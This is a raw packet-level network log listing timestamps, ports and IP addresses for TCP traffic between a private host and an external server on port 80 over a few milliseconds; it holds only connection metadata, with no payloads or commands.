May 6, 2024 07:53:08.960680008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960690975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960694075 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960706949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960711956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960736036 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960757017 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960772038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960784912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960796118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960809946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960809946 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960823059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960828066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960835934 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960836887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960851908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960854053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960860968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960864067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960875988 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960880995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960887909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960887909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960901976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960908890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960915089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960916996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960928917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960935116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960942030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960944891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960954905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960968018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960969925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960984945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.960994959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.960999012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961013079 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961014986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961026907 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961036921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961039066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961052895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961059093 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961065054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961077929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961080074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961091042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961103916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961105108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961117029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961117029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961132050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961143970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961146116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961158991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961165905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961173058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961182117 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961185932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961198092 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961201906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961213112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961216927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961224079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961226940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961241961 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961251974 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961266041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961281061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961294889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961307049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961318970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961319923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961327076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961333990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961344004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961348057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961363077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961371899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961388111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961390018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961402893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961415052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961427927 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961429119 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961441994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961441994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961455107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961457014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961467981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961471081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961481094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961493015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961493969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961517096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961524963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961539030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961553097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961565971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961580038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961580992 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961591959 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961595058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961606026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961617947 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961620092 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961631060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961643934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961647034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961654902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961658955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961668015 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961678028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961682081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961698055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961705923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961713076 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961726904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961735964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961749077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961750984 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961760998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961774111 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961775064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961787939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961796045 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961801052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961813927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961817980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961848021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961853027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961862087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961882114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961884975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961888075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961899996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961910963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961913109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961925030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961925983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961937904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961939096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961950064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961951971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961962938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961966038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961976051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961977959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.961988926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.961996078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962002039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962002993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962016106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962022066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962029934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962044954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962054014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962065935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962066889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962080002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962093115 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962093115 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962105989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962112904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962121010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962133884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962156057 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962178946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962192059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962203026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962214947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962215900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962229013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962235928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962243080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962249994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962275028 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962295055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962316990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962330103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962342024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962353945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962357998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962363958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962364912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962376118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962378025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962388039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962399006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962404013 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962409973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962421894 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962424994 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962433100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962445021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962447882 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962456942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962460995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962469101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962480068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962486029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962491989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962503910 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962507963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962516069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962522030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962527990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962543011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962567091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962595940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962608099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962618113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962629080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962634087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962640047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962652922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962658882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962667942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962667942 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962671995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962697029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962718964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962723970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962733984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962743998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962757111 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962758064 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962769032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962779999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962780952 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962793112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962805033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962805986 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962830067 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962841988 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962865114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962877035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962887049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962898016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962904930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962910891 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962913990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962923050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962934971 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962934971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962946892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962959051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962959051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962970018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962973118 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.962982893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.962995052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963000059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963007927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963020086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963022947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963032007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963036060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963044882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963057041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963059902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963078022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963083029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963089943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963092089 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963103056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963114977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963118076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963126898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963126898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963145971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963152885 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963159084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963171005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963171959 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963182926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963196039 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963206053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963207960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963217020 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963219881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963228941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963241100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963241100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963253975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963265896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963284016 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963294983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963306904 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963318110 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963331938 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963340998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963361025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963377953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963390112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963399887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963412046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963416100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963433981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963434935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963434935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963445902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963448048 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963457108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963469028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963469982 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963478088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963480949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963491917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963498116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963505030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963510990 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963516951 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963527918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963532925 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963553905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963555098 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963567972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963577032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963579893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963598967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963620901 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963641882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963654041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963665009 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963676929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963679075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963690042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963690996 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963704109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963706970 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963717937 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963730097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963733912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963741064 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963752985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963754892 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963766098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963777065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963794947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963799000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963809967 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963810921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963824034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963835955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963838100 CEST	49741	80	192.168.2.4	5.42.66.10
